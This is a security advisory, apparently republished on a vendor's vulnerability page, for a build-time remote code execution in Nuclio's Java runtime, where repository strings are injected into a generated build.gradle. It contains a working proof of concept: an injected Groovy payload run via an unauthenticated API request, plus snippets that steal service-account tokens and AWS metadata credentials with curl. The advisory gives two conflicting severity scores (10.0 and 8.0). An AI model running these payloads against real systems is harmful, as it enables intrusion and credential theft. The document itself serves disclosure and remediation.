Summary
Nuclio: Unsanitized runtimeAttributes.repositories injected into Groovy build.gradle leads to build-time RCE
Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase.
The Dashboard API runs with NOP authentication by default, so no credentials are required. The build container runs as root. The injected command output confirmed by dynamic testing:
[RCE-PROOF] uid=0(root) gid=0(root) groups=0(root)
nuclio-kanikojob.nuclioprocessorvul006rcev3latest.tkxsslz06ppcr
root
BUILD SUCCESSFUL in 512ms
- CWE: CWE-94 (Improper Control of Generation of Code / Code Injection)
- Affected versions: Nuclio <= 1.15.27 (latest as of 2026-05-17, dynamically verified)
Details
Root Cause
pkg/processor/build/runtime/java/runtime.go, function createGradleBuildScript()
Step 1. User input flows from the API into the template data map without validation
types.go:50-64, newBuildAttributes() decodes runtimeAttributes with no content inspection. Any string is accepted for each element of Repositories:
// pkg/processor/build/runtime/java/types.go:50-64
func newBuildAttributes(encodedBuildAttributes map[string]interface{}) (*buildAttributes, error) {
newBuildAttributes := buildAttributes{}
if err := mapstructure.Decode(encodedBuildAttributes, &newBuildAttributes); err != nil {
return nil, errors.Wrap(err, "Failed to decode build attributes")
}
if len(newBuildAttributes.Repositories) == 0 {
newBuildAttributes.Repositories = []string{"mavenCentral()"}
}
return &newBuildAttributes, nil // no validation of repository string contents
}
Step 2. text/template renders repositories verbatim into Groovy DSL
runtime.go:111,139, the template is parsed with text/template, which does not HTML-encode or escape special characters. {{ . }} emits each repository string as-is:
// runtime.go:111
gradleBuildScriptTemplate, err := template.New("gradleBuildScript").Parse(j.getGradleBuildScriptTemplateContents())
// runtime.go:139
err = gradleBuildScriptTemplate.Execute(io.MultiWriter(&gradleBuildScriptTemplateBuffer, buildFile), data)
The template section for repositories (runtime.go:155-159):
repositories {
{{ range .Repositories }}
{{ . }}
{{ end }}
}
{{ . }} is the verbatim output action. Because text/template (unlike html/template) applies no contextual escaping, any character, including }, (, ), newlines, is written directly to the .gradle file.
Step 3. Gradle evaluates the injected Groovy at configuration phase
The generated build.gradle is passed to ./build-user-handler.sh inside the quay.io/nuclio/handler-builder-java-onbuild container. That script runs:
gradle tasks # configuration phase: top-level Groovy runs
gradle userHandler # configuration phase: top-level Groovy runs again
Groovy evaluates every top-level statement in build.gradle before executing any task. Injected code therefore runs unconditionally on both invocations.
Injection Mechanics
Payload for repositories[0]:
mavenCentral()
}
println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)
repositories {
Generated build.gradle (confirmed by Dashboard DEBUG log at path /tmp/nuclio-build-378373988/staging/handler/build.gradle):
plugins {
id 'com.github.johnrengelman.shadow' version '5.2.0'
id 'java'
}
repositories {
mavenCentral()
}
println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)
repositories {
}
dependencies {
compile files('./nuclio-sdk-java-1.1.0.jar')
}
shadowJar {
baseName = 'user-handler'
classifier = null
}
task userHandler(dependsOn: shadowJar)
The } on line 9 closes the repositories {} block. println(...) on line 10 becomes a top-level Groovy statement. repositories { on line 11 re-opens a new block that the template's trailing } correctly closes, making the entire file syntactically valid.
Groovy's List.execute() extension method (e.g., ['sh', '-c', 'cmd'].execute()) runs an OS process. .text captures its standard output. The injected println logs the output to Gradle's stdout, which appears in the kaniko executor log.
Proof of Concept
Environment Setup
The following steps reproduce the verified environment. All commands were executed and verified on 2026-05-17.
1. Create a dedicated kind cluster
cat > /tmp/kind-vul006.yaml <<'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
extraPortMappings:
- containerPort: 8070
hostPort: 8070
protocol: TCP
- role: worker
EOF
kind create cluster --name vul-006 --config /tmp/kind-vul006.yaml
Expected output:
Creating cluster "vul-006" ...
✓ Ensuring node image (kindest/node:v1.27.3)
✓ Preparing nodes
✓ Writing configuration
✓ Starting control-plane
✓ Installing CNI
✓ Installing StorageClass
✓ Joining worker nodes
Set kubectl context to "kind-vul-006"
2. Pre-load required images
# Pull images on host
docker pull quay.io/nuclio/dashboard:1.15.27-amd64
docker pull quay.io/nuclio/controller:1.15.27-amd64
docker pull gcr.io/kaniko-project/executor:v1.23.2
docker pull quay.io/nuclio/handler-builder-java-onbuild:1.15.27-amd64
# Load into kind cluster
kind load docker-image quay.io/nuclio/dashboard:1.15.27-amd64 --name vul-006
kind load docker-image quay.io/nuclio/controller:1.15.27-amd64 --name vul-006
kind load docker-image gcr.io/kaniko-project/executor:v1.23.2 --name vul-006
kind load docker-image quay.io/nuclio/handler-builder-java-onbuild:1.15.27-amd64 --name vul-006
3. Deploy a local image registry accessible from kind nodes
# Start registry (reuse existing if present)
docker run -d --name kind-registry --restart=always \
--network kind -p 127.0.0.1:5001:5000 registry:2
# Verify kind nodes can reach it
REGISTRY_IP=$(docker inspect kind-registry \
--format '{{(index .NetworkSettings.Networks "kind").IPAddress}}')
docker exec vul-006-control-plane curl -s http://${REGISTRY_IP}:5000/v2/
# Expected: {}
4. Install Nuclio via Helm
kubectl --context kind-vul-006 create namespace nuclio
cat > /tmp/nuclio-values.yaml <<'EOF'
dashboard:
enabled: true
containerBuilderKind: "kaniko"
monitorDockerDeamon:
enabled: false
image:
pullPolicy: IfNotPresent
kaniko:
insecurePushRegistry: true
insecurePullRegistry: true
initContainerImage:
busybox:
repository: gcr.io/iguazio/alpine # substitute for busybox if Docker Hub rate-limited
tag: "3.20"
registry:
pushPullUrl: "kind-registry:5000"
controller:
enabled: true
image:
pullPolicy: IfNotPresent
rbac:
create: true
crdAccessMode: cluster
EOF
helm install nuclio ./hack/k8s/helm/nuclio \
--namespace nuclio \
--kube-context kind-vul-006 \
-f /tmp/nuclio-values.yaml \
--wait --timeout 120s
Expected output:
NAME: nuclio
STATUS: deployed
REVISION: 1
5. Expose the Dashboard and verify connectivity
kubectl --context kind-vul-006 port-forward \
-n nuclio svc/nuclio-dashboard 8070:8070 &
# Wait for readiness
sleep 5
curl -s http://localhost:8070/api/functions -o /dev/null -w "HTTP %{http_code}\n"
# Expected: HTTP 200
# Create the default project required by the API
curl -s -X POST http://localhost:8070/api/projects \
-H "Content-Type: application/json" \
-d '{"metadata":{"name":"default","namespace":"nuclio"},"spec":{}}'
Exploitation Steps
Step 1, Send the malicious function definition
The runtimeAttributes.repositories field accepts any string. Use Python to build a
correctly escaped JSON payload:
import json, base64
# Minimal valid Java handler source
java_src = """import io.nuclio.Context;
import io.nuclio.Event;
public class Handler implements io.nuclio.EventHandler {
@Override
public Object handleEvent(Context ctx, Event event) { return "hello"; }
}"""
# Injection: close the repositories block, run a command, re-open the block
injection = (
"mavenCentral()\n"
"}\n"
"println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)\n"
"repositories {"
)
payload = {
"metadata": {"name": "vul006-test", "namespace": "nuclio"},
"spec": {
"runtime": "java",
"handler": "io.nuclio.Handler",
"build": {
"functionSourceCode": base64.b64encode(java_src.encode()).decode(),
"runtimeAttributes": {"repositories": [injection]}
},
"minReplicas": 0, "maxReplicas": 1
}
}
with open("/tmp/payload.json", "w") as f:
json.dump(payload, f)
HTTP_CODE=$(curl -s -o /tmp/response.json -w "%{http_code}" \
-X POST http://localhost:8070/api/functions \
-H "Content-Type: application/json" \
-H "x-nuclio-project-name: default" \
-d @/tmp/payload.json)
echo "HTTP: ${HTTP_CODE}"
Expected output:
HTTP: 202
No authentication required. No validation error for the injected repository value.
Step 2, Confirm template injection in the Dashboard DEBUG log
kubectl --context kind-vul-006 logs \
-n nuclio deploy/nuclio-dashboard --tail=100 \
| grep "Created gradle build script" \
| python3 -c "
import sys, json, re
for line in sys.stdin:
m = re.search(r'Created gradle build script ({.*})', line)
if m:
print(json.loads(m.group(1))['content'])
"
Actual output (from verified run):
plugins {
id 'com.github.johnrengelman.shadow' version '5.2.0'
id 'java'
}
repositories {
mavenCentral()
}
println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)
repositories {
}
dependencies {
compile files('./nuclio-sdk-java-1.1.0.jar')
}
shadowJar {
baseName = 'user-handler'
classifier = null
}
task userHandler(dependsOn: shadowJar)
The Dashboard DEBUG log (path logged: /tmp/nuclio-build-378373988/staging/handler/build.gradle) confirms the injected Groovy reached the file verbatim.
Step 3, Wait for the kaniko build job and observe RCE output
# Wait for the kaniko pod to appear
until kubectl --context kind-vul-006 get pods -n nuclio --no-headers \
| grep -q "kaniko"; do sleep 2; done
POD=$(kubectl --context kind-vul-006 get pods -n nuclio --no-headers \
| grep kaniko | awk '{print $1}')
echo "Build pod: ${POD}"
# Wait for completion
until kubectl --context kind-vul-006 get pod -n nuclio "${POD}" \
--no-headers | grep -qE "Completed|Error"; do sleep 3; done
# Retrieve execution evidence
kubectl --context kind-vul-006 logs -n nuclio "${POD}" \
-c kaniko-executor | grep -A3 "RCE-PROOF"
Actual output (from verified run, pod nuclio-kanikojob.nuclioprocessorvul006rcev3latest.tkxsslz06ppcr):
[RCE-PROOF] uid=0(root) gid=0(root) groups=0(root)
nuclio-kanikojob.nuclioprocessorvul006rcev3latest.tkxsslz06ppcr
root
BUILD SUCCESSFUL in 2s
[RCE-PROOF] uid=0(root) gid=0(root) groups=0(root)
nuclio-kanikojob.nuclioprocessorvul006rcev3latest.tkxsslz06ppcr
root
BUILD SUCCESSFUL in 512ms
The marker [RCE-PROOF] appears twice, once per gradle invocation (gradle tasks
and gradle userHandler). The output confirms:
uid=0(root), execution as root inside the builder container- The pod name as hostname, confirms execution is inside the real build container, not simulated
root,whoamioutput corroborates the UID
Cleanup
kubectl --context kind-vul-006 delete nucliofunction vul006-test -n nuclio
kind delete cluster --name vul-006
Direct Impact
An unauthenticated attacker can execute arbitrary OS commands as root inside the function builder container on every Java function build. Confirmed capabilities from the build container environment:
- Read/write the build container filesystem
- Access network endpoints reachable from the build pod
- Tamper with the compiled function artifact (
.jar) before it is packaged into the
processor image, effectively poisoning the resulting function's image
Privilege Escalation, Docker Socket Escape (Verified: NOT directly exploitable in default configuration)
Verification result: In the default docker builder configuration, direct Docker socket escape via Gradle code injection is NOT exploitable.
Environment
- Cluster: kind-vul-009, Nuclio v1.15.27-amd64
- Builder:
NUCLIO_CONTAINER_BUILDER_KIND=docker(confirmed viakubectl describe) - Dashboard pod:
nuclio-dashboard-5f8ddc949c-sfzh4 - Verified: 2026-05-19 06:21 UTC
docker.sock Mount Confirmed on Dashboard Pod
Mounts:
/var/run/docker.sock from docker-sock (rw)
Volumes:
docker-sock:
Type: HostPath (bare host directory volume)
Path: /var/run/docker.sock
The Docker socket is accessible within the Dashboard container itself (Docker v29.1.2 API confirmed reachable).
Build Flow in docker Builder Mode
Nuclio generates a Dockerfile.onbuild and submits it to Docker daemon via the socket:
FROM quay.io/nuclio/handler-builder-java-onbuild:1.15.27-amd64
COPY handler/build.gradle /home/gradle/src/userHandler
COPY ${NUCLIO_BUILD_LOCAL_HANDLER_DIR} /home/gradle/src/userHandler
RUN cd /home/gradle/src/userHandler && ./build-user-handler.sh # Gradle executes here
Actual command issued (from Dashboard DEBUG log):
docker build --network host --force-rm -t nuclio-onbuild-d8602mam53lc7e12q410 \
-f Dockerfile.onbuild --build-arg NUCLIO_LABEL=1.15.27 ...
Probe Results (Step 7/9 RUN Layer)
Injection payload in repositories[0]:
mavenCentral()
}
println('[PROBE-1] docker.sock exists: ' + new File('/var/run/docker.sock').exists())
println('[PROBE-2] ' + ['sh', '-c', 'ls -la /var/run/docker.sock 2>&1 || echo NOT_FOUND'].execute().text)
println('[PROBE-ENV] hostname=' + ['sh', '-c', 'hostname'].execute().text.trim())
repositories {
Gradle output (captured twice, once per gradle tasks / gradle userHandler invocation):
> Configure project :
[PROBE-1] docker.sock exists: false
[PROBE-2] ls: cannot access '/var/run/docker.sock': No such file or directory
NOT_FOUND
[PROBE-ENV] hostname=VM-0-8-ubuntu
BUILD SUCCESSFUL in 2s
The RCE executed successfully. The docker.sock does not exist inside the RUN-stage container.
Root Cause
Each RUN instruction in a docker build executes inside an isolated intermediate container
(b747a20b21ba). That container:
- Has a filesystem built from image layers only, it does not inherit volume mounts from the caller (the Dashboard container).
--network hostshares the host network namespace (explaininghostname=VM-0-8-ubuntu) but does not share the filesystem.- Docker daemon never exposes the host filesystem (including
/var/run/docker.sock) to build-stage containers unless the Dockerfile explicitly arranges it.
Conditions Required for Exploitability
This path becomes exploitable only under non-default configurations:
- Dockerfile with explicit socket bind: e.g., BuildKit
--mount=type=bind,source=/var/run/docker.sock,...in the onbuild image, or replacingdocker buildwithdocker run -v /var/run/docker.sock:/var/run/docker.sock - Privileged build containers:
--privilegedmode withmknoddevice node creation - Docker-in-Docker setup: Docker daemon pre-installed and launched inside the builder image
None of these conditions exist in the standard Nuclio Helm chart deployment.
Evidence: evidence/logs/docker-builder-socket-probe.log
Privilege Escalation, Kubernetes ServiceAccount Token
The build pod can read the ServiceAccount token mounted within it. However, the kaniko Job's serviceAccountName is sourced from builderServiceAccount, function serviceAccount, kaniko.defaultServiceAccount, or the platform's default function SA (see pkg/containerimagebuilderpusher/kaniko.go:301, :375, :840-849). This is not inherently the same as the Nuclio Dashboard's high-privilege ServiceAccount.
In deployments where the build pod uses a high-privilege ServiceAccount (e.g., where an administrator has bound overly broad RBAC roles to the builder SA), an attacker can read the token and query the Kubernetes API:
// Read the build pod's own SA token (not the Dashboard SA)
def token = new File('/var/run/secrets/kubernetes.io/serviceaccount/token').text
['sh', '-c', "curl -sk -H 'Authorization: Bearer ${token}' " +
'https://kubernetes.default.svc/api/v1/namespaces/nuclio/secrets'].execute().text
The effective permissions of this token depend on the RBAC bindings of the build pod's ServiceAccount. Under least-privilege configurations, this token may not be able to access sensitive resources.
Cross-Tenant Access (Horizontal Escalation)
Nuclio uses Kubernetes namespaces for tenant isolation. Build containers in docker mode share the host Docker daemon. An attacker can enumerate and access containers belonging to other tenants via the Docker socket.
Cloud Instance Metadata (SSRF, Managed Kubernetes)
In EKS, GKE, or AKS environments, the build container can reach the cloud instance metadata service:
// AWS IMDSv2, retrieve IAM role credentials
def imdsToken = ['sh', '-c',
'curl -s -X PUT "http://169.254.169.254/latest/api/token" ' +
'-H "X-aws-ec2-metadata-token-ttl-seconds: 21600"'].execute().text.trim()
def role = ['sh', '-c',
"curl -s -H 'X-aws-ec2-metadata-token: ${imdsToken}' " +
'http://169.254.169.254/latest/meta-data/iam/security-credentials/'].execute().text
Obtained temporary IAM credentials grant access to AWS services (ECR, S3, etc.) available to the node's IAM role.
Severity
CVSS 3.1 Score: 10.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Dashboard API is network-accessible |
| Attack Complexity | Low | Single POST request; no race condition or special preparation |
| Privileges Required | None | Default NOP authentication requires no credentials |
| User Interaction | None | No user action required |
| Scope | Changed | Impact can escape the build container under common production deployments (see below) |
| Confidentiality | High | Registry credentials, SA tokens, cloud credentials readable in most deployments |
| Integrity | High | Function images can be tampered; cluster resources modifiable |
| Availability | High | Build pipeline can be disrupted; cluster resources deletable |
Rating Rationale
This RCE has realistic conditions for further credential acquisition and lateral movement from the build container. In particular, under the following common production deployment scenarios:
- Kaniko builds use registry secrets (image push credentials mounted into the build pod)
- ECR registry provider secrets are configured
- Node IAM metadata is reachable (IMDS not blocked)
- Build pods use a high-privilege ServiceAccount
An attacker can read image registry credentials, AWS/GCP temporary credentials, or Kubernetes SA tokens, and subsequently poison the image registry, access cluster resources, or pivot to cloud resources. A Critical rating is justified under these common deployment conditions.
Downgrade conditions: If a deployment follows least-privilege principles, no registry/cloud credential mounts, IMDS blocked, build SA has no sensitive RBAC bindings, the impact is primarily limited to code execution within the build container and artifact tampering. This remains High severity but should not be justified on the basis of "default lateral movement."
Affected Versions
- Nuclio <= 1.15.27 (latest release as of 2026-05-17)
- All versions that include the Java runtime build path
(pkg/processor/build/runtime/java/runtime.go)
The vulnerability was introduced when the Java runtime and its runtimeAttributes support were added and has not been addressed in any release to date.
Patched Versions
https://github.com/nuclio/nuclio/releases/tag/1.16.5
Workarounds
Until a patch is released, the following mitigations reduce exposure:
Enable authentication on the Dashboard. Set
NUCLIO_AUTH_KINDto a non-NOP
authenticator (e.g.,iguazio). This prevents unauthenticated access to the function
creation API.Network-restrict the Dashboard port (8070). Allow access only from trusted internal
networks or VPN. Do not expose the Dashboard to the public internet.Disable Java runtime support if not in use. Remove the Java runtime handler from
the dashboard deployment configuration.Use kaniko over docker builder. In kaniko mode the Docker socket is not mounted,
eliminating the host-escape path. The build-time RCE remains exploitable, but the
blast radius is reduced to the build pod.
Remediation Recommendations
Option 1, Input validation (recommended for quick fix)
In newBuildAttributes() (types.go:50), validate each repository string against an allowlist pattern before accepting it:
import "regexp"
var repoPattern = regexp.MustCompile(`^[a-zA-Z0-9_\-\(\)\.:\/]+$`)
for _, repo := range newBuildAttributes.Repositories {
if !repoPattern.MatchString(repo) {
return nil, fmt.Errorf("invalid repository value: %q", repo)
}
}
Option 2, Replace text/template with a safe rendering approach
The repositories block should not use a Go template at all. Build the build.gradle content programmatically using string concatenation with per-value validation, rather than via a template that cannot express per-field escaping semantics.
Option 3, Content Security: reject newlines and Groovy metacharacters
Reject any repository value containing \n, \r, {, }, (, ), ', ". These characters are not present in valid Maven repository declarations.
Resources
pkg/processor/build/runtime/java/runtime.go,createGradleBuildScript()(line 87)pkg/processor/build/runtime/java/runtime.go,getGradleBuildScriptTemplateContents()(line 149)pkg/processor/build/runtime/java/types.go,newBuildAttributes()(line 50)- Go
text/templatedocumentation: https://pkg.go.dev/text/template - Groovy
List.execute()/String.execute(): https://docs.groovy-lang.org/latest/html/groovy-jdk/java/lang/String.html#execute() - Nuclio Dashboard authentication configuration: https://nuclio.io/docs/latest/reference/api/nuclio_dashboard_api/
Impact
Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.
CVE-2026-52833 has a CVSS score of 8.0 (High). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.16.5); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
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Frequently Asked Questions
- What is CVE-2026-52833? CVE-2026-52833 is a high-severity code injection vulnerability in github.com/nuclio/nuclio (go), affecting versions < 1.16.5. It is fixed in 1.16.5. Untrusted input is evaluated as executable code within the application's runtime environment.
- How severe is CVE-2026-52833? CVE-2026-52833 has a CVSS score of 8.0 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/nuclio/nuclio are affected by CVE-2026-52833? github.com/nuclio/nuclio (go) versions < 1.16.5 is affected.
- Is there a fix for CVE-2026-52833? Yes. CVE-2026-52833 is fixed in 1.16.5. Upgrade to this version or later.
- Is CVE-2026-52833 exploitable, and should I be worried? Whether CVE-2026-52833 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-52833 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-52833? Upgrade
github.com/nuclio/nuclioto 1.16.5 or later.